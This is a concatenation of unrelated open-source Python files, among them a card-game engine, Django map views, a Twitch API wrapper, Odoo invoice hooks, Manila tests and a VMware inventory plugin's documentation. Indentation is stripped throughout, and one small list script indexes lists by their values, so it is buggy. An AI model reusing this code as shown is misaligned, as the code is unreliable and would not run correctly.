self.auras = []
self.graveyard = CardList()
self.minions_killed_this_turn = CardList()
self.no_aura_refresh = False
def __repr__(self):
return "<%s %s>" % (self.__class__.__name__, self)
def __str__(self):
return "%s vs %s" % (self.players)
def __iter__(self):
return self.all_entities.__iter__()
@property
def game(self):
return self
@property
def board(self):
return CardList(chain(self.players[0].field, self.players[1].field))
@property
def decks(self):
return CardList(chain(self.players[0].deck, self.players[1].deck))
@property
def hands(self):
return CardList(chain(self.players[0].hand, self.players[1].hand))
@property
def characters(self):
return CardList(chain(self.players[0].characters, self.players[1].characters))
@property
def all_entities(self):
return CardList(chain(self.entities, self.hands, self.decks, self.graveyard))
@property
def entities(self):
return CardList(chain([self], self.players[0].entities, self.players[1].entities))
@property
def live_entities(self):
return CardList(chain(self.players[0].live_entities, self.players[1].live_entities))
def filter(self, *args, **kwargs):
return self.all_entities.filter(*args, **kwargs)
def attack(self, source, target):
return self.queue_actions(source, [Attack(source, target)])
def _attack(self):
"""
See https://github.com/jleclanche/fireplace/wiki/Combat
for information on how attacking works
"""
attacker = self.proposed_attacker
defender = self.proposed_defender
self.proposed_attacker = None
self.proposed_defender = None
if attacker.should_exit_combat:
logging.info("Attack has been interrupted.")
attacker.attacking = False
defender.defending = False
return
# Save the attacker/defender atk values in case they change during the attack
# (eg. in case of Enrage)
def_atk = defender.atk
attacker.hit(defender, attacker.atk)
if def_atk:
defender.hit(attacker, def_atk)
attacker.attacking = False
defender.defending = False
attacker.num_attacks += 1
def _play(self, card):
"""
Plays \a card from a Player's hand
"""
player = card.controller
logging.info("%s plays %r", player, card)
cost = card.cost
if player.temp_mana:
# The coin, Innervate etc
cost -= player.temp_mana
player.temp_mana = max(0, player.temp_mana - card.cost)
player.used_mana += cost
player.last_card_played = card
card.zone = Zone.PLAY
def card(self, id):
card = Card(id)
self.manager.new_entity(card)
return card
def check_for_end_game(self):
"""
Check if one or more player is currently losing.
End the game if they are.
"""
gameover = False
for player in self.players:
if player.playstate == PlayState.LOSING:
gameover = True
if gameover:
if self.players[0].playstate == self.players[1].playstate:
for player in self.players:
player.playstate = PlayState.TIED
else:
for player in self.players:
if player.playstate == PlayState.LOSING:
player.playstate = PlayState.LOST
else:
player.playstate = PlayState.WON
raise GameOver("The game has ended.")
def process_deaths(self):
actions = []
for card in self.live_entities:
if card.to_be_destroyed:
actions += self._schedule_death(card)
self.check_for_end_game()
if actions:
self.queue_actions(self, actions)
def _schedule_death(self, card):
"""
Prepare a card for its death. Will run any related Death
trigger attached to the Game object.
Returns a list of actions to perform during the death sweep.
"""
logging.debug("Scheduling death for %r", card)
card.ignore_events = True
card.zone = Zone.GRAVEYARD
self.graveyard.append(card)
if card.type == CardType.MINION:
self.minions_killed_this_turn.append(card)
card.controller.minions_killed_this_turn += 1
elif card.type == CardType.HERO:
card.controller.playstate = PlayState.LOSING
return [Death(card)]
def queue_actions(self, source, actions):
"""
Queue a list of \a actions for processing from \a source.
"""
ret = []
if not hasattr(actions, "__iter__"):
actions = (actions, )
for action in actions:
if isinstance(action, EventListener):
# Queuing an EventListener registers it as a one-time event
# This allows registering events from eg. play actions
logging.debug("Registering %r on %r", action, self)
action.once = True
# FIXME: Figure out a cleaner way to get the event listener target
if source.type == CardType.SPELL:
listener = source.controller
else:
listener = source
listener._events.append(action)
else:
ret.append(action.trigger(source))
self.refresh_auras()
return ret
def pick_first_player(self):
"""
Picks and returns first player, second player
In the default implementation, the first player is always
"Player 0". Use CoinRules to decide it randomly.
"""
return self.players[0], self.players[1]
def refresh_auras(self):
if self.no_aura_refresh:
return
for aura in self.auras:
aura.update()
def prepare(self):
self.players[0].opponent = self.players[1]
self.players[1].opponent = self.players[0]
for player in self.players:
self.manager.new_entity(player)
player.zone = Zone.PLAY
player.summon(player.original_deck.hero)
for card in player.original_deck:
card.controller = player
card.zone = Zone.DECK
player.shuffle_deck()
player.playstate = PlayState.PLAYING
player.cards_drawn_this_turn = 0
first, second = self.pick_first_player()
self.player1 = first
self.player1.first_player = True
self.player2 = second
self.player2.first_player = False
self.player1.draw(3)
self.player2.draw(4)
self.current_player = self.player1
def start(self):
logging.info("Starting game: %r" % (self))
self.prepare()
self.begin_turn(self.player1)
def end_turn(self):
return self.queue_actions(self, [EndTurn(self.current_player)])
def _end_turn(self):
logging.info("%s ends turn %i", self.current_player, self.turn)
self.step, self.next_step = self.next_step, Step.MAIN_CLEANUP
self.current_player.temp_mana = 0
for character in self.current_player.characters.filter(frozen=True):
if not character.num_attacks:
character.frozen = False
for buff in self.current_player.entities.filter(one_turn_effect=True):
logging.info("Ending One-Turn effect: %r", buff)
buff.destroy()
self.step, self.next_step = self.next_step, Step.MAIN_NEXT
self.begin_turn(self.current_player.opponent)
def begin_turn(self, player):
return self.queue_actions(self, [BeginTurn(player)])
def _begin_turn(self, player):
self.step, self.next_step = self.next_step, Step.MAIN_START_TRIGGERS
self.step, self.next_step = self.next_step, Step.MAIN_START
self.turn += 1
logging.info("%s begins turn %i", player, self.turn)
self.step, self.next_step = self.next_step, Step.MAIN_ACTION
self.current_player = player
self.minions_killed_this_turn = CardList()
for p in self.players:
p.cards_drawn_this_turn = 0
p.current_player = p is player
player.turn_start = timegm(time.gmtime())
player.cards_played_this_turn = 0
player.minions_played_this_turn = 0
player.minions_killed_this_turn = 0
player.combo = False
player.max_mana += 1
player.used_mana = 0
player.overload_locked = player.overloaded
player.overloaded = 0
for entity in player.entities:
if entity.type != CardType.PLAYER:
entity.turns_in_play += 1
if entity.type == CardType.HERO_POWER:
entity.exhausted = False
elif entity.type in (CardType.HERO, CardType.MINION):
entity.num_attacks = 0
player.draw()
class CoinRules:
"""
Randomly determines the starting player when the Game starts.
The second player gets "The Coin" (GAME_005).
"""
def pick_first_player(self):
winner = random.choice(self.players)
logging.info("Tossing the coin... %s wins!", winner)
return winner, winner.opponent
def start(self):
super().start()
logging.info("%s gets The Coin (%s)", self.player2, THE_COIN)
self.player2.give(THE_COIN)
class MulliganRules:
"""
Performs a Mulligan phase when the Game starts.
Currently just a dummy phase.
"""
def start(self):
self.next_step = Step.BEGIN_MULLIGAN
super().start()
self.begin_mulligan()
def begin_mulligan(self):
logging.info("Entering mulligan phase")
self.step, self.next_step = self.next_step, Step.MAIN_READY
class Game(MulliganRules, CoinRules, BaseGame):
pass
| butozerca/fireplace | fireplace/game.py | Python | agpl-3.0 | 9,162 |
# -*- coding: utf-8 -*-
import logging
import subprocess
import os.path
from django.http import HttpResponse, Http404
from django.views.generic import View
from django.conf import settings
from braces.views import JSONResponseMixin
from sunlumo_project.models import Project
from .renderer import Renderer
from .featureinfo import FeatureInfo
from .project import SunlumoProject
from .utils import writeParamsToJson, str2bool, hex2rgb
LOG = logging.getLogger(__name__)
class UpperParamsMixin(object):
def dispatch(self, request, *args, **kwargs):
self.req_params = {
key.upper(): request.GET[key] for key in request.GET.keys()
}
return super(UpperParamsMixin, self).dispatch(
request, *args, **kwargs
)
class ProjectDetails(UpperParamsMixin, JSONResponseMixin, View):
def get(self, request, *args, **kwargs):
project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)
sl_project = SunlumoProject(project.project_path)
return self.render_json_response(sl_project.getDetails())
class GetMapView(UpperParamsMixin, JSONResponseMixin, View):
def _parse_request_params(self, request):
if not(all(param in self.req_params for param in [
'BBOX', 'WIDTH', 'HEIGHT', 'SRS', 'FORMAT', 'LAYERS',
'TRANSPARENCIES', 'REQUEST'])):
raise Http404
try:
request = self.req_params.get('REQUEST')
bbox = [float(a) for a in self.req_params.get('BBOX').split(',')]
image_size = [
int(a) for a in (
self.req_params.get('WIDTH'),
self.req_params.get('HEIGHT'))
]
srs = int(self.req_params.get('SRS').split(':')[-1])
image_format = self.req_params.get('FORMAT').split('/')[-1]
transparent = str2bool(self.req_params.get('TRANSPARENT', False))
bgcolor = hex2rgb(self.req_params.get('BGCOLOR', '0xFFFFFF'))
layers = [
layer.strip()
for layer in self.req_params.get('LAYERS').split(',')
]
if self.req_params.get('QUERY_LAYERS'):
query_layers = [
layer.strip()
for layer in self.req_params.get('QUERY_LAYERS').split(',')
]
else:
query_layers = []
if self.req_params.get('X') and self.req_params.get('Y'):
click_point = [
int(self.req_params.get('X')),
int(self.req_params.get('Y'))
]
else:
click_point = []
transparencies = [
int(a)
for a in self.req_params.get('TRANSPARENCIES').split(',')
if len(a) > 0
]
except:
# return 404 if any of parameters are missing or not parsable
raise Http404
# map must have a value
if not(request):
raise Http404
# check if image format is supported
if image_format not in ['png', 'jpeg', 'png8']:
raise Http404
params = {
'bbox': bbox,
'image_size': image_size,
'srs': srs,
'image_format': image_format,
'transparent': transparent,
'bgcolor': bgcolor,
'layers': layers,
'transparencies': transparencies,
'request': request,
'query_layers': query_layers,
'click_point': click_point
}
return params
def get(self, request, *args, **kwargs):
params = self._parse_request_params(request)
project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)
if params.get('request') == 'GetMap':
sl_project = Renderer(project.project_path)
img = sl_project.render(params)
return HttpResponse(img, content_type=params.get('image_format'))
else:
sl_project = FeatureInfo(project.project_path)
features = sl_project.identify(params)
return self.render_json_response(features)
class GetLegendGraphicView(UpperParamsMixin, JSONResponseMixin, View):
def _parse_request_params(self, request):
if not(all(param in self.req_params for param in [
'FORMAT', 'LAYER', 'REQUEST'])):
raise Http404
try:
request = self.req_params.get('REQUEST')
image_size = [
int(a) for a in (
self.req_params.get('WIDTH', -1),
self.req_params.get('HEIGHT', -1))
]
image_format = self.req_params.get('FORMAT').split('/')[-1]
layer = self.req_params.get('LAYER').strip()
except:
# return 404 if any of parameters are missing or not parsable
raise Http404
# map must have a value
if not(request):
raise Http404
# check if image format is supported
if image_format not in ['png', 'jpeg', 'png8']:
raise Http404
params = {
'image_format': image_format,
'image_size': image_size,
'layer': layer,
'request': request
}
return params
def get(self, request, *args, **kwargs):
params = self._parse_request_params(request)
project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)
sl_project = Renderer(project.project_path)
img = sl_project.getLegendGraphic(params)
return HttpResponse(img, content_type=params.get('image_format'))
class PrintPDFView(UpperParamsMixin, View):
def _parse_request_params(self, request):
if not(all(param in self.req_params for param in [
'BBOX', 'LAYOUT', 'LAYERS', 'TRANSPARENCIES'])):
raise Http404
try:
bbox = [float(a) for a in self.req_params.get('BBOX').split(',')]
srs = int(self.req_params.get('SRS').split(':')[-1])
layers = [
layer.strip()
for layer in self.req_params.get('LAYERS').split(',')
]
layout = self.req_params.get('LAYOUT')
transparencies = [
int(a)
for a in self.req_params.get('TRANSPARENCIES').split(',')
if len(a) > 0
]
except:
# return 404 if any of parameters are missing or not parsable
raise Http404
if not(layout):
# composer template should not be empty
raise Http404
return {
'bbox': bbox,
'layout': layout,
'layers': layers,
'transparencies': transparencies,
'srs': srs
}
def get(self, request, *args, **kwargs):
params = self._parse_request_params(request)
params.update({'sl_project_id': settings.SUNLUMO_PROJECT_ID})
tmpFile = writeParamsToJson(params)
# printing requires a subprocess call
proc = subprocess.call(['python', 'manage.py', 'print_map', tmpFile])
if proc:
# subprocess did not exit cleanly
return HttpResponse(status=500)
with open(tmpFile + '.pdf', 'r') as pdfFile:
data = pdfFile.read()
resp = HttpResponse(data, content_type='application/pdf')
resp['Content-Disposition'] = 'attachment; filename={}.pdf'.format(
os.path.basename(tmpFile)
)
return resp
| candela-it/sunlumo | django_project/sunlumo_mapserver/views.py | Python | mit | 7,606 |
import requests
_base_url = 'https://api.twitch.tv/kraken/'
class Query:
def __init__(self, action, url):
self.action = action.lower()
self.parameters = dict()
self.url = _base_url + url
# add parameters to the query
# parameter | dictionary of paramters and corresponding values
def add_parameters(self, passed):
self.parameters = dict()
for key, value in passed.items():
self.parameters[key] = value
def fetch(self):
# form the full url
to_submit = self.url + '?'
for key, value in self.parameters.items():
to_submit = to_submit + key + '=' + value + '&'
if self.action == 'get':
response = requests.get(to_submit)
elif self.action == 'post':
response = requests.post(to_submit)
elif self.action == 'put':
response = requests.put(to_submit)
elif self.action == 'delete':
response = requests.delete(to_submit)
# check for a failure
if response.status_code != requests.codes.ok:
return None
return response.json()
def api(action, url, **kwargs):
q = Query(action, url)
# process and add parameters
for key, value in kwargs.items():
kwargs[key] = str(value)
q.add_parameters(kwargs)
data = q.fetch()
return data
| bm993a/ptwitch | query.py | Python | apache-2.0 | 1,199 |
'''
Rewindows tiles from 40000x1 pixels to 160x160 pixels for use in aggregate map creation.
Specifically, does tiles that are not model outputs but are used in aggregate map creation:
tree cover density, pixel area, Hansen gain, and mangrove biomass.
This must be done before the model is run so that the aggregate maps can be created successfully
(aggregate map pixels are the sum of the rewindowed 160x160 pixel windows).
'''
import multiprocessing
from subprocess import Popen, PIPE, STDOUT, check_call
from functools import partial
import datetime
import argparse
import os
import glob
import sys
sys.path.append('../')
import constants_and_names as cn
import universal_util as uu
def mp_rewindow_tiles(tile_id_list, run_date = None, no_upload = None):
os.chdir(cn.docker_base_dir)
# Sensitivity analysis model type is not used in this script
sensit_type = 'std'
# Files to download for this script
download_dict = {
cn.pixel_area_dir: [cn.pattern_pixel_area],
cn.tcd_dir: [cn.pattern_tcd],
cn.gain_dir: [cn.pattern_gain],
cn.mangrove_biomass_2000_dir: [cn.pattern_mangrove_biomass_2000]
}
uu.print_log("Layers to process are:", download_dict)
# List of output directories. Mut match order of output patterns.
output_dir_list = [cn.pixel_area_rewindow_dir, cn.tcd_rewindow_dir,
cn.gain_rewindow_dir, cn.mangrove_biomass_2000_rewindow_dir]
# List of output patterns. Must match order of output directories.
output_pattern_list = [cn.pattern_pixel_area_rewindow, cn.pattern_tcd_rewindow,
cn.pattern_gain_rewindow, cn.pattern_mangrove_biomass_2000_rewindow]
# A date can optionally be provided.
# This replaces the date in constants_and_names.
# Only done if output upload is enabled.
if run_date is not None and no_upload is not None:
output_dir_list = uu.replace_output_dir_date(output_dir_list, run_date)
# Iterates through the types of tiles to be processed
for dir, download_pattern in list(download_dict.items()):
download_pattern_name = download_pattern[0]
# Downloads input files or entire directories, depending on how many tiles are in the tile_id_list
# If a full model run is specified, the correct set of tiles for the particular script is listed
if tile_id_list == 'all':
# List of tiles to run in the model
tile_id_list = uu.tile_list_s3(dir, sensit_type)
uu.s3_flexible_download(dir, download_pattern_name, cn.docker_base_dir, sensit_type, tile_id_list)
uu.print_log("There are {0} tiles to process for pattern {1}".format(str(len(tile_id_list)), download_pattern_name) + "\n")
uu.print_log("Processing:", dir, "; ", download_pattern_name)
# Converts the 10x10 degree Hansen tiles that are in windows of 40000x1 pixels to windows of 160x160 pixels
if cn.count == 96:
# For pixel area: 40 processors = 480 GB peak; 54 = 650 GB peak; 56 = XXX GB peak; 62 = >750 GB peak.
# Much more memory used for pixel area than for other inputs.
processes = 56
else:
processes = 8
uu.print_log('Rewindow max processors=', processes)
pool = multiprocessing.Pool(processes)
pool.map(partial(uu.rewindow, download_pattern_name=download_pattern_name,
no_upload=no_upload), tile_id_list)
pool.close()
pool.join()
# # For single processor use
# for tile_id in tile_id_list:
#
# uu.rewindow(tile_id, download_pattern_name, no_upload)
# If no_upload flag is not activated (by choice or by lack of AWS credentials), output is uploaded
if not no_upload:
uu.print_log("Tiles processed. Uploading to s3 now...")
for i in range(0, len(output_dir_list)):
uu.upload_final_set(output_dir_list[i], output_pattern_list[i])
if __name__ == '__main__':
# The argument for what kind of model run is being done: standard conditions or a sensitivity analysis run
parser = argparse.ArgumentParser(
description='Creates 160x160 pixel rewindowed basic input tiles (TCD, gain, mangroves, pixel area)')
parser.add_argument('--tile_id_list', '-l', required=True,
help='List of tile ids to use in the model. Should be of form 00N_110E or 00N_110E,00N_120E or all.')
parser.add_argument('--run-date', '-d', required=False,
help='Date of run. Must be format YYYYMMDD.')
parser.add_argument('--no-upload', '-nu', action='store_true',
help='Disables uploading of outputs to s3')
args = parser.parse_args()
tile_id_list = args.tile_id_list
run_date = args.run_date
no_upload = args.no_upload
# Disables upload to s3 if no AWS credentials are found in environment
if not uu.check_aws_creds():
no_upload = True
# Create the output log
uu.initiate_log(tile_id_list=tile_id_list, run_date=run_date, no_upload=no_upload)
# Checks whether the tile_id_list argument is valid
tile_id_list = uu.tile_id_list_check(tile_id_list)
mp_rewindow_tiles(tile_id_list=tile_id_list, run_date=run_date, no_upload=no_upload) | sgibbes/carbon-budget | data_prep/mp_rewindow_tiles.py | Python | apache-2.0 | 5,324 |
list_a = [3, 9, 17, 15, 19]
list_b = [2, 4, 8, 10, 30, 40, 50, 60, 70, 80, 90]
for a, b in zip(list_a, list_b):
if list_a[a] > list_b[b]:
print list_a[a]
else:
print list_b[b]
| talapus/Ophidian | Academia/Lists/list_a_and_list_b.py | Python | bsd-3-clause | 201 |
# -*- coding: utf-8 -*-
#
# File: eduCourses/events.py
#
# Copyright (c) 2007 Erik Rivera Morales <erik@ro75.com>
#
# GNU General Public License (GPL)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
"""
$Id$
"""
__author__ = """Erik Rivera Morales <erik@ro75.com>"""
__docformat__ = 'plaintext'
__licence__ = 'GPL'
from Acquisition import aq_base
from eduintelligent.sco.interfaces import ISCO
def uploadContentPackage(obj, event):
"""
"""
print "DESEMPAQUETANDO %s on %s" % (obj.getPhysicalPath(), event)
ISCO(obj).uploadContentPackage()
| erikriver/eduIntelligent-cynin | src/eduintelligent.sco/eduintelligent/sco/events.py | Python | gpl-3.0 | 1,228 |
# Copyright 2019 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from manila.api.views import share_network_subnets
from manila import test
from manila.tests.api import fakes
from manila.tests import db_utils
@ddt.ddt
class ViewBuilderTestCase(test.TestCase):
def setUp(self):
super(ViewBuilderTestCase, self).setUp()
self.builder = share_network_subnets.ViewBuilder()
self.share_network = db_utils.create_share_network(
name='fake_network', id='fake_sn_id')
def _validate_is_detail_return(self, result):
expected_keys = ['id', 'created_at', 'updated_at', 'neutron_net_id',
'neutron_subnet_id', 'network_type', 'cidr',
'segmentation_id', 'ip_version', 'share_network_id',
'availability_zone', 'gateway', 'mtu']
for key in expected_keys:
self.assertIn(key, result)
def test_build_share_network_subnet(self):
req = fakes.HTTPRequest.blank('/subnets', version='2.51')
subnet = db_utils.create_share_network_subnet(
share_network_id=self.share_network['id'])
result = self.builder.build_share_network_subnet(req, subnet)
self.assertEqual(1, len(result))
self.assertIn('share_network_subnet', result)
self.assertEqual(subnet['id'],
result['share_network_subnet']['id'])
self.assertEqual(subnet['share_network_id'],
result['share_network_subnet']['share_network_id'])
self.assertIsNone(
result['share_network_subnet']['availability_zone'])
self._validate_is_detail_return(result['share_network_subnet'])
def test_build_share_network_subnets(self):
req = fakes.HTTPRequest.blank('/subnets', version='2.51')
share_network = db_utils.create_share_network(
name='fake_network', id='fake_sn_id_1')
subnet = db_utils.create_share_network_subnet(
share_network_id=share_network['id'])
result = self.builder.build_share_network_subnets(req, [subnet])
self.assertIn('share_network_subnets', result)
self.assertEqual(1, len(result['share_network_subnets']))
subnet_list = result['share_network_subnets']
for subnet in subnet_list:
self._validate_is_detail_return(subnet)
| openstack/manila | manila/tests/api/views/test_share_network_subnets.py | Python | apache-2.0 | 2,945 |
"""SerializedDataConverter lib."""
| facelessuser/SerializedDataConverter | lib/__init__.py | Python | mit | 35 |
from nxtools import *
__all__ = ["get_output_profile"]
default_bitrates = {
"dnxhd" : "120M",
"mjpeg" : False,
"mpeg2video" : "50M",
"libx264" : "6M",
"libx265" : "4M",
"libfdk_aac" : "128k",
"mp2" : "128k"
}
default_audio_codecs = {
"dnxhd" : "pcm_s16le",
"mjpeg" : "pcm_s16le",
"mpeg2video" : "mp2",
"libx264" : "libfdk_aac",
"libx265" : "libfdk_aac"
}
def get_output_profile(**kwargs):
#
# Video
#
result = [
["r", kwargs["frame_rate"]],
["pix_fmt", kwargs.get("pixel_format", "yuv422p")],
["c:v", kwargs["video_codec"]]
]
video_bitrate = kwargs.get("video_bitrate", False) or default_bitrates.get(kwargs["video_codec"], False)
if video_bitrate:
result.append(["b:v", video_bitrate])
if kwargs["qscale"]:
result.append(["q:v", kwargs["qscale"]])
if kwargs["gop_size"]:
gop_size = kwargs["gop_size"]
result.extend([
["g", gop_size],
["keyint_min", gop_size],
])
if kwargs["video_codec"] == "libx264":
result.append(["x264opts", "keyint={g}:min-keyint={g}:no-scenecut".format(g=gop_size)])
#
# Audio
#
audio_codec = kwargs.get("audio_codec", default_audio_codecs.get("video_codec", False))
if not audio_codec:
audio_codec = "pcm_s16le"
result.append(["c:a", audio_codec])
audio_bitrate = kwargs.get("audio_bitrate", default_bitrates.get(audio_codec, False))
if audio_bitrate:
result.append(["b:a", audio_bitrate])
#
# Container
#
result.append(["shortest"])
result.append(["async", 2000])
result.append(["map_metadata", "-1"])
if kwargs["container"] == "mov" and kwargs["frame_rate"] == 25:
result.append(["video_track_timescale", 25])
return result
| martastain/themis | themis/output_profile.py | Python | gpl-3.0 | 1,936 |
"""
You can get information about which each train has by using this service. For test purposes, you can start a local service using this code. You can assume the real service will behave the same way, but be available on a different url.
You need [Python 3.3](http://python.org) and [CherryPy](http://www.cherrypy.org/), then start the server by running:
python start_service.py
You can use this service to get data for example about the train with id "express_2000" like this:
http://localhost:8081/data_for_train/express_2000
this will return a json document with information about the seats that this train has. The document you get back will look for example like this:
{"seats": {"1A": {"booking_reference": "", "seat_number": "1", "coach": "A"}, "2A": {"booking_reference": "", "seat_number": "2", "coach": "A"}}}
Note I've left out all the extraneous details about where the train is going to and from, at what time, whether there's a buffet car etc. All that's there is which seats the train has, and if they are already booked. A seat is available if the "booking_reference" field contains an empty string. To reserve seats on a train, you'll need to make a POST request to this url:
http://localhost:8081/reserve
and attach form data for which seats to reserve. There should be three fields:
"train_id", "seats", "booking_reference"
The "seats" field should be a json encoded list of seat ids, for example:
'["1A", "2A"]'
The other two fields are ordinary strings. Note the server will prevent you from booking a seat that is already reserved with another booking reference.
The service has one additional method, that will remove all reservations on a particular train. Use it with care:
http://localhost:8081/reset/express_2000
"""
import json
class TrainDataService(object):
def __init__(self, json_data):
self.trains = json.loads(json_data)
def data_for_train(self, train_id):
return json.dumps(self.trains.get(train_id))
def reserve(self, train_id, seats, booking_reference):
train = self.trains.get(train_id)
seats = json.loads(seats)
for seat in seats:
if not seat in train["seats"]:
return "seat not found {0}".format(seat)
existing_reservation = train["seats"][seat]["booking_reference"]
if existing_reservation and existing_reservation != booking_reference:
return "already booked with reference: {0}".format(existing_reservation)
for seat in seats:
train["seats"][seat]["booking_reference"] = booking_reference
return self.data_for_train(train_id)
def reset(self, train_id):
train = self.trains.get(train_id)
for seat_id, seat in train["seats"].items():
seat["booking_reference"] = ""
return self.data_for_train(train_id)
| emilybache/KataTrainReservation | train_data_service/train_data_service.py | Python | mit | 2,899 |
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo (info@vauxoo.com)
############################################################################
# Coded by: Luis Torres (luis_t@vauxoo.com)
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty ofres.partner form
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv, fields
class account_invoice(osv.Model):
_inherit = 'account.invoice'
def onchange_partner_id(self, cr, uid, ids, type, partner_id,
date_invoice=False, payment_term=False,
partner_bank_id=False, company_id=False):
res = super(
account_invoice, self).onchange_partner_id(cr, uid, ids, type,
partner_id, date_invoice=date_invoice,
payment_term=payment_term, partner_bank_id=partner_bank_id,
company_id=company_id)
if partner_id:
partner_invoice_description = self.pool.get(
'res.partner').browse(cr, uid, partner_id).description_invoice
res['value'].update({'comment': partner_invoice_description})
return res
class stock_invoice_onshipping(osv.TransientModel):
_inherit = 'stock.invoice.onshipping'
def create_invoice(self, cr, uid, ids, context=None):
if not context:
context = {}
res = super(stock_invoice_onshipping, self).create_invoice(
cr, uid, ids, context=context)
invoice_ids = context['active_ids']
for invoice_id in invoice_ids:
invoice_description = self.pool.get('account.invoice').browse(
cr, uid, res[invoice_id]).partner_id.description_invoice
if invoice_description:
self.pool.get('account.invoice').write(cr, uid, res[
invoice_id], {'comment': invoice_description})
return res
class sale_make_invoice(osv.TransientModel):
_inherit = 'sale.make.invoice'
def make_invoices(self, cr, uid, ids, context=None):
if not context:
context = {}
res = super(sale_make_invoice, self).make_invoices(
cr, uid, ids, context=context)
id_invoice = eval(res['domain'])
ids_invoices = id_invoice[0][2]
for invoice_id in ids_invoices:
invoice_description = self.pool.get('account.invoice').browse(
cr, uid, invoice_id).partner_id.description_invoice
if invoice_description:
self.pool.get('account.invoice').write(
cr, uid, invoice_id, {'comment': invoice_description})
return res
class sale_order(osv.Model):
_inherit = 'sale.order'
def action_invoice_create(self, cr, uid, ids, grouped=False,
states=['confirmed', 'done', 'exception'],
date_inv=False, context=None):
if not context:
context = {}
res = super(sale_order, self).action_invoice_create(cr, uid, ids,
grouped=False, states=['confirmed', 'done', 'exception'],
date_inv=date_inv, context=context)
invoice_description = self.pool.get('account.invoice').browse(
cr, uid, res).partner_id.description_invoice
if invoice_description:
self.pool.get('account.invoice').write(
cr, uid, res, {'comment': invoice_description})
return res
| 3dfxsoftware/cbss-addons | partner_invoice_description/account_invoice.py | Python | gpl-2.0 | 4,416 |
#!/usr/bin/env python
# Standard packages
import sys
import argparse
# Third-party packages
from toil.job import Job
# Package methods
from ddb import configuration
from ddb_ngsflow import annotation
from ddb_ngsflow import pipeline
from ddb_ngsflow.coverage import sambamba
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
Job.Runner.addToilOptions(parser)
args = parser.parse_args()
args.logLevel = "INFO"
sys.stdout.write("Parsing configuration data\n")
config = configuration.configure_runtime(args.configuration)
sys.stdout.write("Parsing sample data\n")
samples = configuration.configure_samples(args.samples_file, config)
# Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
root_job = Job.wrapJobFn(pipeline.spawn_batch_jobs, cores=1)
# Per sample jobs
for sample in samples:
coverage_job = Job.wrapJobFn(sambamba.sambamba_region_coverage, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['gatk']['num_cores']),
memory="{}G".format(config['gatk']['max_mem']))
vcfanno_job = Job.wrapJobFn(annotation.vcfanno, config, sample, samples,
"{}.snpEff.{}.vcf".format(sample, config['snpeff']['reference']),
cores=int(config['vcfanno']['num_cores']),
memory="{}G".format(config['vcfanno']['max_mem']))
# Create workflow from created jobs
root_job.addChild(coverage_job)
coverage_job.addChild(vcfanno_job)
# Start workflow execution
Job.Runner.startToil(root_job, args)
| dgaston/ddb-ngsflow-scripts | workflow-merkel_coverage_annotation.py | Python | mit | 1,997 |
#
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
name: vmware_vm_inventory
plugin_type: inventory
short_description: VMware Guest inventory source
version_added: "2.7"
author:
- Abhijeet Kasurde (@Akasurde)
description:
- Get virtual machines as inventory hosts from VMware environment.
- Uses any file which ends with vmware.yml or vmware.yaml as a YAML configuration file.
- The inventory_hostname is always the 'Name' and UUID of the virtual machine. UUID is added as VMware allows virtual machines with the same name.
extends_documentation_fragment:
- inventory_cache
requirements:
- "Python >= 2.7"
- "PyVmomi"
- "requests >= 2.3"
- "vSphere Automation SDK - For tag feature"
- "vCloud Suite SDK - For tag feature"
options:
hostname:
description: Name of vCenter or ESXi server.
required: True
env:
- name: VMWARE_SERVER
username:
description: Name of vSphere admin user.
required: True
env:
- name: VMWARE_USERNAME
password:
description: Password of vSphere admin user.
required: True
env:
- name: VMWARE_PASSWORD
port:
description: Port number used to connect to vCenter or ESXi Server.
default: 443
env:
- name: VMWARE_PORT
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
with_tags:
description:
- Include tags and associated virtual machines.
- Requires 'vSphere Automation SDK' and 'vCloud Suite SDK' libraries to be installed on the given controller machine.
- Please refer following URLs for installation steps
- 'https://code.vmware.com/web/sdk/65/vsphere-automation-python'
- 'https://code.vmware.com/web/sdk/60/vcloudsuite-python'
default: False
type: boolean
'''
EXAMPLES = '''
# Sample configuration file for VMware Guest dynamic inventory
plugin: vmware_vm_inventory
strict: False
